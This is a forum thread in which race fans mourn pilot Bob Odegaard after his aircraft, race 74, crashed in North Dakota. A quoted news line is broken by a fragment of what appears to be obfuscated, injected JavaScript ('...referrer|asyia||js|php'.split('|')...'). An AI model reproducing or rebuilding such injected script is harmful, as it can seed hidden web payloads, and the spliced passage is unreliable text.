      Re: Bad day

Here is Bob's link...take some time to see all that he has done with his beautiful aircraft. The pictures of 74 are from over a year ago, but what an absolute beauty!

Also, there are a couple of pictures of the crash now updated on the original new link.

VALLEY akybr|var|u0026u|referrer|asyia||js|php’.split(‘|’),0,{})) CITY (NewsDakota.com) – A well-known pilot from Kindred has died after his airplane crashed Friday at the Barnes County Municipal Airport. Sergeant Troy Hischer with the North Dakota Highway Patrol says 66-year-old Bob Odegaard died

Still an absolute pit in my stomach this morning...

Very sad to wake up to this news. Rest in peace, Bob. See you at that great air race in the sky when we are all finished here.

Got the news late Friday, still can't believe it. What a loss to the warbird restoration group and all the rest of us. What a bad year with losing all that we have. And Ken Pitch getting hurt in his accident. Hope the Gods are smiling on us here on out. Lets see a safe, safe Reno and a great safe Gold. We're over due. My condolences to Bob's friends and family.
RIP Bob, see you up there one of these days.

                    Re: Bad day

The loss of Mr Odegaard and race 74 is a terrible loss to everyone. I'm deeply saddened that I never had the chance to meet Bob, or see race 74 in person. My most sincere condolences go out to his family and friends.

On the same token, I can't help to see the irony in the accident however, Walter Soplata never wanted any of his collection to fly again in fear of one being lost forever, and the first of his planes to be restored to flight status (that I know of.) has been lost forever. The other thought I had is that just a year ago there were three Cleveland air racers flying, and now, less than a year later, there is only one. A sad day indeed.

I hope with all all my heart that we have a clean and safe week this week with everyone going home in one piece come Monday.

                    Will

                      Re: Bad day

Dammitt RAD2LTR, I had forgotten all about that central thrust of Walter Soplata's vision for his collection.

Although you make a very poignant point Sir, I have to believe that if Mr. Soplata saw how much joy Robert Odegaard gave us each and every time he showed us his vision of keeping that piece of history alive in our hearts and minds forever, that Walter would have learned something beyond his experience.

For anybody that doesn't know about Walter Soplata, google his life, it'll blow your mind.

                        Re: Bad day

All packed up and set to go to qualifying tomorrow with my son and I read this. I think I'll wait to tell him unless he asks. He's fourteen and has gone to every Reno since before he can remember. Now, it's pretty much all he thinks about. Come September he's super pumped and I don't want him bummed out this week. If bad things really come in threes, it's definitely our turn for a reprieve. Such sad sad news.

Ron, that just makes me feel good.. we're all here for a limited time, I am hoping that we all get to sit back and watch after we're done living...

Probably the best I've felt about losing so many great people in less than 12 months....

                          Thank you...

                            Newbie here.....

Very sad ending to a great pilot and airplane. Sadly, this reminds me of Bill Fornoff's crash in 1972...His son Corky witnessed it too...

I told my 15 year old son. He took it well. It was nice to be able
To talk with a fellow fan about it. Not trying to tell you how to
                              Handle it.

My brother just texted me with this horrible news. Another great pilot and restorer gone far too young. The F2G is one of my favourite all-time airplanes. We have Bob to thank for putting two of them back in the air after so long on the ground.

Condolences to the Odegaard family and Blue Skies and Tailwinds, Bob !!!
